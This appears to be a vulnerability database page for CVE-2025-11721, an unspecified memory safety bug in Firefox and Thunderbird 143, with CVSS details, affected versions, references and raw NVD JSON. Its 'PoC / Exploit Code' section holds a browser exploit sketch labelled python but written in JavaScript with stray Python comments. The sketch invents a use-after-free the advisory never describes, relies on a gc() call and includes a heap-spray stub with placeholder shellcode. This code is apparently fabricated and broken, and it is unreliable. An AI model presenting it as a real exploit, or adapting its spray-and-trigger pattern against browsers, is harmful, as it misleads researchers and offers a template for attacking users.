CVE-2025-11721

Description

Memory safety bug present in Firefox 143 and Thunderbird 143. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 144 and Thunderbird 144.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE

Mozilla Firefox < 144

Mozilla Thunderbird < 144

Mozilla Firefox 143

Mozilla Thunderbird 143

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11721 - Firefox 143 / Thunderbird 143 Memory Safety Bug PoC
# Note: This is a conceptual PoC demonstrating the exploitation pattern for memory safety bugs.
# Actual exploitation requires precise memory layout control and may vary by platform.
# WARNING: For educational and authorized testing purposes only.

// PoC for Use-After-Free type memory corruption in Firefox 143
// The vulnerability exists in the JavaScript engine's object handling

function trigger_uaf() {
    // Step 1: Create an object that will be vulnerable to UAF
    let vulnerable_obj = {
        data: new ArrayBuffer(0x1000),
        callback: function() { return this.data; }
    };

    // Step 2: Store a reference for later use after free
    let saved_ref = vulnerable_obj.callback;

    // Step 3: Trigger garbage collection to free the object
    vulnerable_obj = null;
    gc(); // Force garbage collection

    // Step 4: Allocate new objects to fill the freed memory slot
    let spray = [];
    for (let i = 0; i < 10000; i++) {
        spray.push(new ArrayBuffer(0x1000));
    }

    // Step 5: Access the dangling pointer - triggers UAF
    // This causes memory corruption as the freed memory is now reused
    try {
        saved_ref();
    } catch(e) {
        // Memory corruption has occurred
    }
}

// Alternative: Heap spray + type confusion trigger
function heap_spray_exploit() {
    let shellcode = new Uint8Array([
        0x90, 0x90, 0x90, 0x90, // NOP sled
        // Shellcode would be placed here for arbitrary code execution
    ]);

    // Spray heap with controlled data
    let spray_arr = [];
    for (let i = 0; i < 0x1000; i++) {
        spray_arr.push(shellcode);
    }

    // Trigger the memory corruption vulnerability
    trigger_uaf();
}

// Execute the exploit
trigger_uaf();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11721
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11721
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11721/
[4] VulDB https://vuldb.com/cve/CVE-2025-11721
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=1986816
[6] https://www.mozilla.org/security/advisories/mfsa2025-81/
[7] https://www.mozilla.org/security/advisories/mfsa2025-84/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11721", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:38.520", "lastModified": "2026-04-13T15:16:41.590", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bug present in Firefox 143 and Thunderbird 143. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 144 and Thunderbird 144."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionStartIncluding": "143.0", "versionEndExcluding": "144.0", "matchCriteriaId": "4B82B1C7-1B0F-45B7-8234-D85DDEB63886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "143.0", "versionEndExcluding": "144.0", "matchCriteriaId": "08E54DCC-0AA4-47DE-9DF2-C4135B0D433D"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1986816", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}